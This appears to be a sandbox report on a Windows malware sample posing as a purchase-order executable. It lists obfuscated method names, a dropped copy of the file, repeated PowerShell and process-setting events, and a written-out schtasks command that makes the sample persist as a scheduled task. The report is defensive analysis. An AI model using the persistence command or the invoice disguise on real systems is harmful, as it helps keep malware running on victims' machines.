                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, WcaNQhB3bw1x35cBHL.csHigh entropy of concatenated method names: 'QeUImDipFo', 'VLgIfaAVy2', 'BnPI8hDYeK', 'fYeIUwMcNo', 'nJSINxh3HL', 'FywI0hM8FO', 'xjIIyJOVo1', 'e8kIAsE5C8', 'kLaIWfdAry', 'HQnI4DHXsk'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, BvSJtFG5lWjZ7c1TuV.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'vam73npoQn', 'uwD7YIIhPe', 'Jei7zY76H4', 'rO6Gr8FerQ', 'rRCGj5hgq1', 'x74G78GIMR', 'MXfGGAUV9M', 'L0aG0eMtHyjHRCLMOPh'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, H9EGUT2SKjXSJfk38q.csHigh entropy of concatenated method names: 'KdCMi83bL8', 'AUSMTdqiNa', 'ToString', 'GDAMld4Zg7', 'xNoMqfMyN1', 'fgYMdocHEc', 's58MZUsN3A', 'yBPMnl1vxM', 'pXgMIvWQTt', 'VlTMg2nD6m'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, LO5KghyFmULJZEXBJx.csHigh entropy of concatenated method names: 'ffR9ANwNJr', 'GOp9WqWOYX', 'uZk9pqylTW', 'S3w9wnnLtq', 'lO99QrGL3G', 'LZ89oBYbhs', 'TqD9XReOJa', 'Pa89klqZ9x', 'I5c9FVwRgc', 'C3h9e5N6nF'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, vXxeeL4UMKpi5529nPR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JurtsH1nIn', 'OlftH44lV6', 'dZatvyKva4', 'WkstLG4C6n', 'EjYtbZ7Wq3', 'BKvt545Wtf', 'qeYt1DnTZp'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, pt09oCJZUOjinJQ3Wg.csHigh entropy of concatenated method names: 'ADTSlRbq7L', 'MCkSqKirvH', 'ICCSdeLA6Q', 'LwuSZFUIRg', 'KH8SnxngwD', 'gudSIxLKuy', 'w8KSg1YgOR', 'UbWScFVQIg', 'UmASiWidMk', 'i9aSTsjhn6'
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeFile created: C:\Users\user\AppData\Roaming\jDCErdK.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp"
                    Source: C:\Windows\System32\wbem\WMIADAP.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WmiApRpl\Performance

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\wbem\WMIADAP.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance Performance Data
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
